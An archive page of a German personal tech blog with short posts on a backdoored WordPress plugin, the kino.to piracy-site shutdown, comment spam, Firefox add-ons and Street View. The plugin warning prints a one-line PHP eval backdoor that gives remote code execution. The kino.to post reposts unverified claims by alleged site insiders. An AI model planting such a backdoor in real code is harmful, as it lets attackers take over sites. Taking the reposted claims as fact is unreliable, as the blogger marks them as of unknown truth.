Hack Archive

wp-phpmyadmin Plug-In – Jetzt löschen!

Nutzt du das WordPress Plug-In WP-phpmyadmin? Dann solltest du es jetzt laut den Sucuri Experten sofort löschen. Die Security Experten haben verschiedenen Seiten gesehen welche durch die Nutzung von wp-phpmyadmin gehackt wurden.
Der Angriff hat durch eine Backdoor statt gefunden, der folgende Code befand sich in der upgrade.php Datei:

<?php if(isset($_REQUEST["asc"]))eval(stripslashes($_REQUEST["asc"])); ?>

Dieser Teil ist laut Sucuri nicht Bestandteil des Plug-Ins und erlaubt den Remote Zugriff auf die WordPress Installation.

Das Plug-In soll Zugriff auf phpMyAdmin direkt aus WordPress heraus geben, ist aber schon seit einigen Jahren nicht mehr upgedatet worden. Bitte prüfen ob ihr das Plug nutzt und wenn ja ggf. entfernen!

Sucuri

Kino.to ist offline genommen worden

Vor knapp einer Woche habe ich zum Ersten Mal etwas von kino.to wahrgenommen – Thomas Schwenke schrieb dazu auf spreerecht.de einen Artikel.

Auf kino.to konnte man anscheinend Streams von aktuellen (Kino) Filmen und Serien ansehen. Legal oder Illegal kann ich nicht bewerten, schaut euch den Artikel bei spreerecht.de an und bildet eure eigene Meinung.

Bei Caschy habe ich dann soeben gelesen dass die Seite offline ist – scheinbar hat die Kripo zugeschlagen und den/die Betreiber fest genommen. Auf kino.to findet man nur noch folgenden Hinweis:

thingybob-kino-to-kripo

Dieser sieht allerdings doch reichlich merkwürdig aus, ich möchte auch bezweifeln, dass die Kripo einen solchen Text hinterlässt – die Aussagen passen irgendwie nicht so recht, eine kleine Analyse dazu findet ihr bei smBlogger.de

Das alles sieht ziemlich nach Fake aus – auch wenn mir kein rechter Grund einfallen würde warum man das faken sollte wenn man mit der Seite Millionen verdient (hat).

Allerding schreibt auch Spiegel Online über den Vorgang:

Es ist ein Großschlag gegen Urheberrechtsverletzer: Die Staatsanwaltschaft Dresden ermittelt gegen die Streaming-Seite kino.to. Bei Razzien in mehreren europäischen Ländern wurden 13 Personen verhaftet. Ihnen wird die Bildung einer kriminellen Vereinigung vorgeworfen.

Deren Informationen stammen wohl von der GVU, zumindest sind einige Passagen fast wortgleich übernommen worden. Die GVU Seite ist derzeit etwas schwer erreichbar, aber den Inhalt der Pressemitteilung kann man wie gesagt quasi bei Spiegel Online nachlesen.

Mit kino.to sind auch noch einige andere Domains verschwunden welche scheinbar mit dem Streaming in Verbindung standen.

Mal sehen ob die merkwürdige Mitteilung auf kino.to so stehen bleibt oder ob sich jemand anderes als die Kripo zu dem Text ‘bekennt’.

Update 1:

Hier gibt es Teile des angeblichen Durchsuchungsbeschlusses zu sehen (Echt oder nicht, ich weiß es nicht)

http://bit.ly/lwjEPv
http://bit.ly/lOHreS

Update 2:

Jetzt ist die dubiose Mitteilung auf kino.to nicht mehr zu sehen, statt dessen kommt eine freundliche ‘502 Bad Gateway’ Mitteilung von nginx.

Überlastet sollte die Seite eigentlich nicht sein, aber man weiß ja nie.

Was mir – wenn ich so drüber nachdenke – noch komisch vorkommt ist die Tatsache, dass man doch die Server beschlagnahmt hat – hat die Kripo da einen Server mitgebracht um eine Meldung zu präsentieren?

Update 3:

Folgendes geistert derzeit durch das Netz, Fake oder Wahr – wer weiß das schon:

Lieber Nutzerinnen und Nutzer,

Wie ihr wahrscheinlich mitbekommen habt wurden welche von uns gebustet . Es kam auch bei mir zu einer HD und ich bin gerade in einem Internet Café Eure visits bzw eure IP wurde NICHT gespeichert alles was verbreitet wird oder wurde ist gelogen . Es wurden zwar Server beschlagnahmt , diese waren aber mit Truecrypt verschlüsselt , Ich war nicht in Untersuchungshaft bzw noch nicht es wurden auch meine HDD’s und Computer mitgenommen und mit extra anzeigen weil sie andere dinge gefunden haben. Diese Überwachungsaktionen wurden nicht im Rahmen des Gesetzes unternommen unter anderem wurden Telefone abgehört , Leute beschattet nur wegen der “Vermutung”
Ich denke ich habe noch mal Glück gehabt da mein Rechner auch gecryptet war. Die gerüchte sind war das Kino.to Kontakt zu Speedtest , dies sollte nur klar gestellt werden aber Speedtest hat nichts verbrochen . Gelder sind vorhanden , Kino.to kommt bald wieder aber wahrscheinlich unter neuer Leitung . Zur Info, der Hoster hat uns nicht sitzengelassen sondern einer der Team Mitglieder hat sich verplappert und wurde erpresst . Nein wir haben nie etwas mit Kinderpornographie am Hut gehabt . Und nein killu ist nicht der Boss oder hat damit etwas zu tun .
Zudem wird unser Rechtsbeistand gegen klagen wegen ungesetzlicher Beschattung auf Grund von Vermutungen ohne Beweisen . Ich wiederhole es besteht keine Gefahr für euch.

Update 4:

Und noch ein Text eines ‘uppers’ (ich bin echt zu alt für diesen hacker slang.) – auch hier gilt, keine Aussage zum Wahrheitsgehalt:

So nun kann ich auch mal klartext reden zu dem Vorfall….
Die Betreiber wussten seit letzter Woche Freitag es nur noch eine Frage der Zeit ist bis es zu unzähligen Hausbesuchen kommt. (Ich war dort upper und habe meine Streams zur verfügung gestellt). Deswegen wurde von allen was der Betreiber (Namen möchte ich nicht nennen) voll kopiert und auf einen dritt Man übermittelt der Die Seite, falls es zu einem bust kommt, wieder aufbauen soll.
Diese komplettes Backup mit der kompletten DB und allen Logs exisitiert noch!
Die kommenden Tage wird es eine Spiegel Seite geben und die ganzen Hoster werden unter anderen Namen und vorkehrungen wieder aufgebaut. Ein Projekt steht kurz vor der Eröffnung mehr dazu die Tage.
Zu der festnahme: Die Polizei nimmt an das sie alle Hintermänner haben… falsch gedacht. das Team bestand oder besteht noch aus 26 Mitgliedern, 2 davon aus Polen. Das heißt hälfte der Betreiber sind nocha uf freien Fuß.
Diese Betreiber haben ständigen Kontakt zueinander und tauchen erstmal in andere Staaten unter, betreiben aber noch unzählige Sharing Seiten.
Hinter Kino.to steckt einiges mehr also „nur“ eine Stream Seite das solltet ihr bedenken. „7 stelliger Bereich“ ist dabei noch untertrieben. Da wir ein NP Board sind plauder ich noch ein bisschen Weiter…

Wer regelmäßig Kinofilem lädt kennt mit sicherheit „Pleaders“. Das ist eine Filme Rls Groupt und ratet mal wer dahinter steckt.. Genau! es sind 34 Leute in unterschiedlichen Staaten. und all diese 34 Menschen haben für kino.to gearbeitet…

kino.to ist noch lange nicht Geschichte. Auf deren Server werden immer noch Filme ohne ende verteilt hochgeladen und genuked… da ich verlässliche Kontakmänner zu deren Irc habe.
Alle die was anderes behaupten sind schlicht und ergreifend lügner….

MFG Hasbihal alias crystal1

Update 5:

Caschy hat noch ein Bild zur kino.to Struktur gefunden:

thingybob-kino-to-struktur

Spreerecht.de | Caschy | smBlogger.de | Spiegel Online | GVU

Antispambee

Über das WordPress PlugIn Antispambee habe ich ja schon mal geschrieben – zur Abwehr von Kommentarspam bin ich immer noch davon begeistert.

Heut mal ein kleines Bespiel eines geblockten Kommentars, besonders dämlich finde ich diesen Spammer schon alleine wegen der Textwahl, da sind andere Spammer doch deutlich intelligenter und deren Kommentare würden bei einer ‘normalen’ Freigabe schon mal durchrutschen können.

thingybob-antispambee-beispiel

Dieser Kommentar wurde geblockt wegen ‘CSS Hack’ – aber was beutet das, auf den ersten Blick wird das gar nicht klar. Aber wenn man den Kommentar editiert dann sieht man, dass hinter der e-Mail Adresse ein Code eingegeben ist:

[email protected] /* <![CDATA[ */ (fuXction(){try{var s,a,i,j,r,c,l=document.gXtElementById("__cf_email__");a=l.className;if(a){s=“;r=parsXInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.creatXTextNode(s);l.parentNode.replXceChild(s,l);}}catch(e){}})(); /* ]]> */

Ich kann nicht programmieren, aber das sieht nicht wirklich gut aus (damit das unschädlich wird habe ich eine Buchstaben ersetzt!)

Würde mich freuen wenn mir jemand erklären könnte was genau dieser Aufruf bewirken soll. Zurück zum Thema, AntispamBee hat den Kommentar erfolgreich geblockt – und dafür mal wieder Daumen hoch. Ich kann das nur jedem für sein Block empfehlen!

Antispambee

Firefox Add-ons und der Speed

Dein Firefox startet mal wieder langsam? Es dauert ewig bis du browsen kannst?

Vielleicht liegt es gar nicht an Firefox direkt sondern an den tausend installierten Add-ons – mal ehrlich, wer hat da nicht mehr installiert als man wirklich benötigt?
Ich habe mal grade bei mir reingesehen, ich habe sage und schreibe 55 Erweiterungen installiert – das sollte ich mich über die ein oder andere Verzögerung eigentlich nicht weiter wundern.

Wie dem auch sei, Mozilla ist natürlich daran gelegen fest zu stellen, dass Firefox ja wirklich schnell ist und wenn es mal rumschneckt, dann sind es wohl die Add-Ons. Aus diesem Grund haben sie jetzt eine Übersicht erstellt auf der derzeit die beliebtesten Add-ons gelistet sind und man ablesen kann, welchen Impact das auf das Firefoc Startverhalten hat:

firefox addons

Da sind schon einige dabei welche ich auch nutze. Und ich stelle grade mal wieder fest, dass ich einige doch eigentlich gar nicht benötige, muss gleich mal ausmisten gehen.

Komischerweise schreibt Mozilla über der Tabelle etwas von Startverzögerungen, aber weiter oben im Text steht ‘ make it difficult to use for regular web browsing’ – das ist für mich ein kleiner Unterschied. Das langsame Starten kann man durchaus verschmerzen, ein langsames Browsen aber nicht. Ich vermute mal, man wollte nicht zu sehr auf den Erweiterungen rumhacken, denn schließlich lebt Firefox auf genau von den vielfachen Möglichkeiten.

Naja, Aufräumen kann mal in keinem fall schaden!

Google Street View startet Heute in Deutschland

Jau, es geht los.

Nach dem ganzen Ärger und Hickhack um Google Street View startet der Dienst heute auch in Deutschland.

Es gab viele die Street View nur als Ärgernis sahen und meiner Meinung nach den ganzen Sinn nicht verstanden haben – z.B. scheinen viele Leute der Ansicht zu sein, dass das ein Live Bild Dienst ist, ansonsten kann ich mir nicht erklären warum so viele falsche Meinungen dazu aufgekommen sind.

Egal, eine Gemeinde hat scheinbar gesehen dass nicht alles nur Käse ist und somit ist die Weltstadt OBERSTAUFEN die erste komplett in Google Street View zu sehende Stadt!

Man höre und staune, in Oberstaufen wird das sogar gefeiert und es gibt KUCHEN!

Meine Gratulation geht nach Oberstaufen, gut gedacht, fein gemacht und Gratulation.

Hier ausprobieren